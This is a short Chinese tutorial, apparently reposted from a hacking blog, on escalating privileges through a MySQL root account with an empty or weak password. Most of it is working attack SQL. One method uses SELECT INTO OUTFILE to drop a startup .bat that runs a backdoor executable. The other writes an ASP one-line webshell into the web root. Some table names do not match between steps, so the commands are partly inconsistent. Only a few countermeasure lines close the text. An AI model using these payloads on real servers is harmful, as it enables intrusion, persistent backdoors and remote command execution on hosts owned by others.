MYSQL提权技巧

转老邪

问题对象：有虚拟主机空间商．网站服务器  
过程：建立一个表→在表中输入我们的提权内容→出表→完成  
1.mysql默认开启3306端口．如果服务器默认密码不设置就是空密码．黑客们就可能利用该弱口令漏洞．来攻击我们的服务器．  
2.如果在得到用户名为：root 密码为：（空密码时候），黑客就可以攻击进我们网站的．答案他们利用导出一句话木马．  
3.黑客可以得到一个webshell然后．查看网站配置信息．就可以找到这个账号和密码.例如inc.php coon.asp等这些文件  
4.虚拟主机提供商，自己给我们的mysql账号和密码．  
一  
创建新表，开机自启动，来得到cmd，其命令如下：  
1：创建一个新的表  
create table hx小龙 (cmd text);  
含义:创建了一个新的表，表名为bycnboytest，表中只存放一个字段，字段名为cmd，为text文本］

二是：运行我们的后门木马之类的东西．大家自己灵活．

insert into hx小龙 values ("（路径）c:/cmd11.exe " );

三：输出表为一个bat的脚本文件  
select * from bycnboytest into outfile "c://docume~1//alluse~1//「开始」菜单//程序//启动//54td.bat";  
导出一个文件文：54td.bat（c://docume~1//alluse~1//「开始」菜单//程序//启动/此路径才为开机自启动）  
二  
导出一句木马类：  
执行：show databases; 看服务器中有些什么数据库  
use test;进入数据库  
show tables;查看我们进入数据库中有些什么数据表


create table hx小龙123 (cmd text); 创建一个新的表  
insert into hx小龙123 values ("<%execute request("textarea1")%> " );在表中插入一句话木马内容


select * from hx小龙123 into outfile "（导出到网站物理路径如）：D:/www/web/54td.asp";

应对措施：  
将上方的启动目录，设置为不可写  
安装关机还原等软件  
网站重要文件进行加密等。